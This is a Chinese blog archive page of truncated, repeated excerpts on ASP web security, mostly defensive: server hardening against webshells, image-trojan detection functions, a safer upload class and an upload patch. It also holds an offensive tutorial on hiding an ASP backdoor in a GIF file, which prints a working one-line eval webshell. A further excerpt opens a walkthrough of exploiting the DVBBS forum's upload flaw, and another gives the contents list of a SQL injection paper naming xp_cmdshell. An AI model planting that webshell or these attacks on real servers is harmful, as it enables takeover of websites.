作者:红魂浩天
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
...
阅读全文…
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。
asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp
后门还是我众马中的首选,现在我们就把它作成图片asp木马。
首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式:
<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>
一、include给我们指路
接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。
...
阅读全文…
ASP木马Webshell之安全防范解决办法
[ 2009-09-26 08:32:38 | 作者: admin ]
文章简介:本文将为大家介绍在MicrosoftWin系列SERVER(IIS5.0、IIS6.0)中如何简单快速解决ASP中危险组件对WEB服务器系统的安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去ASP木马、Webshell所面对的提升权限、甚至危害到系统安全的威胁。
本文作者:李泊林/LeeBolin资深系统工程师、专业网络安全顾问。已成功为国内多家大中型企业,ISP服务商提供了完整的网络安全解决方案。尤其擅长于整体网络安全方案的设计、大型网络工程的策划、以及提供完整的各种服务器系列安全整体解决方案。
ASP木马、Webshell之安全防范解决办法正文内容:
注意:本文所讲述之设置方法与环境:适用于MicrosoftWindows2000Server/Win2003SERVER|IIS5.0/IIS6.0
1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:
...
阅读全文…
本文作者:李泊林/LeeBolin资深系统工程师、专业网络安全顾问。已成功为国内多家大中型企业,ISP服务商提供了完整的网络安全解决方案。尤其擅长于整体网络安全方案的设计、大型网络工程的策划、以及提供完整的各种服务器系列安全整体解决方案。
ASP木马、Webshell之安全防范解决办法正文内容:
注意:本文所讲述之设置方法与环境:适用于MicrosoftWindows2000Server/Win2003SERVER|IIS5.0/IIS6.0
1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:
...
阅读全文…
2个检测ASP图片木马的函数
[ 2009-09-26 08:26:46 | 作者: admin ]
如果是自己的服务器可以单独设置文件夹得运行权限(执行权限,无),即使上传木马也不会执行……
原文地址:http://blog.163.com/shui99/blog/static/6989944720091692456828/
阅读全文…
原文地址:http://blog.163.com/shui99/blog/static/6989944720091692456828/
'*******************************************************************************************************************************
' 函数说明:检测ASP图片木马的函数。由于FSO无法读取客户端文件的内容,所以只能在文件上传到服务器后再打开文件进行内容检查。
' 木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的
'ASP代码插在图片编
...' 函数说明:检测ASP图片木马的函数。由于FSO无法读取客户端文件的内容,所以只能在文件上传到服务器后再打开文件进行内容检查。
' 木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的
'ASP代码插在图片编
阅读全文…
数据库安全收录:Sql Server应用程序的高级Sql注入
[ 2009-09-26 08:13:03 | 作者: admin ]
本文作者:未知
文章出处:未知
文章性质:原创
阅读次数:22
发布日期:2004-09-27
Sql-Server应用程序的高级Sql注入
本文作者:Chris Anley
翻译: luoluo [luoluonet@hotmail.com]
小组: http://www.ph4nt0m.net/
http://www.play8.net/
[目 录]
[概要]
[介绍]
[通过错误信息获取信息]
[更深入的访问]
[xp_cmdshell]
[xp_regread]
[其他扩展存储]
[联合服务器]
[用户自定义扩展存储]
[向表中导入文本文件]
[利用BCP创建文本文件]
[SQL-Server里的ActiveX 脚本]
[存储过程]
[高级Sql注入]
[没有引号的字符串]
[Sql-Injection二次注入]
...
阅读全文…
文章出处:未知
文章性质:原创
阅读次数:22
发布日期:2004-09-27
Sql-Server应用程序的高级Sql注入
本文作者:Chris Anley
翻译: luoluo [luoluonet@hotmail.com]
小组: http://www.ph4nt0m.net/
http://www.play8.net/
[目 录]
[概要]
[介绍]
[通过错误信息获取信息]
[更深入的访问]
[xp_cmdshell]
[xp_regread]
[其他扩展存储]
[联合服务器]
[用户自定义扩展存储]
[向表中导入文本文件]
[利用BCP创建文本文件]
[SQL-Server里的ActiveX 脚本]
[存储过程]
[高级Sql注入]
[没有引号的字符串]
[Sql-Injection二次注入]
...
阅读全文…
无组件上传中禁止ASP木马上传代码,ASP下测试通过
[ 2009-09-25 23:15:54 | 作者: admin ]
Function CheckASP(Byval sFileName)
dim FStream,stamp,sData
Set FStream=Server.createobject(”ADODB.Stream”)
FStream.Open
FStream.Type=1
FStream.LoadFromFile sFileName
FStream.position=0
stamp=FStream.read
sData = ByteArray2Text( stamp )
If SniffHtml( sData ) Then
FStream.Close
Set FStream=nothing
CheckASP = true
EXIT Function
End If
If SniffASP( sData ) Then
FStream.Close
Set FStream=nothing
...
阅读全文…
dim FStream,stamp,sData
Set FStream=Server.createobject(”ADODB.Stream”)
FStream.Open
FStream.Type=1
FStream.LoadFromFile sFileName
FStream.position=0
stamp=FStream.read
sData = ByteArray2Text( stamp )
If SniffHtml( sData ) Then
FStream.Close
Set FStream=nothing
CheckASP = true
EXIT Function
End If
If SniffASP( sData ) Then
FStream.Close
Set FStream=nothing
...
阅读全文…
先锋无组件上传类(杜绝上传漏洞版) Ver2004
[ 2009-09-25 23:13:18 | 作者: admin ]
<%
'--------------------------------------------------------------------------------------------
'转发时请保留此声明信息,这段声明不并会影响你的速度!
'******************* 先锋无组件上传类(杜绝上传漏洞版) Ver2004 ********************
'作者:梁无惧、孙立宇、apollosun、ezhonghua
'官方网站:[url]http://www.lkstar.com[/url] 技术支持论坛:[url]http://bbs.lkstar.com[/url]
'电子邮件:kickball@netease.com 在线QQ:94294089
'版权声明:版权没有,盗版不究,源码公开,各种用途均可免费使用,欢迎你到技术论坛来寻求支持。
...'--------------------------------------------------------------------------------------------
'转发时请保留此声明信息,这段声明不并会影响你的速度!
'******************* 先锋无组件上传类(杜绝上传漏洞版) Ver2004 ********************
'作者:梁无惧、孙立宇、apollosun、ezhonghua
'官方网站:[url]http://www.lkstar.com[/url] 技术支持论坛:[url]http://bbs.lkstar.com[/url]
'电子邮件:kickball@netease.com 在线QQ:94294089
'版权声明:版权没有,盗版不究,源码公开,各种用途均可免费使用,欢迎你到技术论坛来寻求支持。
阅读全文…
发布先锋无组件上传安全漏洞补丁
[ 2009-09-25 23:12:54 | 作者: admin ]
前一阵发现现有多数网站广泛采用的先锋上传组件存在安全漏洞,攻击者可借此攻击网站并导致网站服务器dllhost停止响应。原理很简单,源程序没有对提交的文件扩展名的有无进行判断就进行检验,遇到提交无扩展名的文件,服务dllhost因程序错误而挂起,黑客可以反复提交无扩展名文件来攻击服务器,造成服务器的停止响应。
补丁如下:
找到无组件上传class中这样一句:“oFileInfo.FileName = GetFileName(sFileName)”
在它下面添加如下判断语句:
If InStrRev(oFileInfo.FileName,".",-1)=0 then '重要修改,防止提交不带扩展名的文件导致服务器dllhost挂起
isErr_ =4 '文件名非法
ErrMessage_="文件名缺少扩展名"
...
阅读全文…
补丁如下:
找到无组件上传class中这样一句:“oFileInfo.FileName = GetFileName(sFileName)”
在它下面添加如下判断语句:
If InStrRev(oFileInfo.FileName,".",-1)=0 then '重要修改,防止提交不带扩展名的文件导致服务器dllhost挂起
isErr_ =4 '文件名非法
ErrMessage_="文件名缺少扩展名"
...
阅读全文…
动网论坛上传文件漏洞的原理以及攻击的代码实现(老问题)
[ 2009-09-25 21:59:59 | 作者: admin ]
DVBBS7.0 SP2以下通杀.虽然有些
人已经知道了攻击方法,但是还是存在一些问题.下面我就动网的这个漏洞做一下讲解.(不知道会不会被人
骂,因为这个漏洞实在太大了).
我们先看一下动网论坛上传文件的相关代码:
'===========无组件上传(upload_0)====================
sub upload_0()
set upload=new UpFile_Class ''建立上传对象
upload.GetDate (int(Forum_Setting(56))*1024) '取得上传数据,不限大小
iCount=0
if upload.err > 0 then
select case upload.err
case 1
Response.Write "请先选择你要上传的文件 [ <a href=# onclick=history.go(-1)>重新上传</a> ]"
...
阅读全文…
人已经知道了攻击方法,但是还是存在一些问题.下面我就动网的这个漏洞做一下讲解.(不知道会不会被人
骂,因为这个漏洞实在太大了).
我们先看一下动网论坛上传文件的相关代码:
'===========无组件上传(upload_0)====================
sub upload_0()
set upload=new UpFile_Class ''建立上传对象
upload.GetDate (int(Forum_Setting(56))*1024) '取得上传数据,不限大小
iCount=0
if upload.err > 0 then
select case upload.err
case 1
Response.Write "请先选择你要上传的文件 [ <a href=# onclick=history.go(-1)>重新上传</a> ]"
...
阅读全文…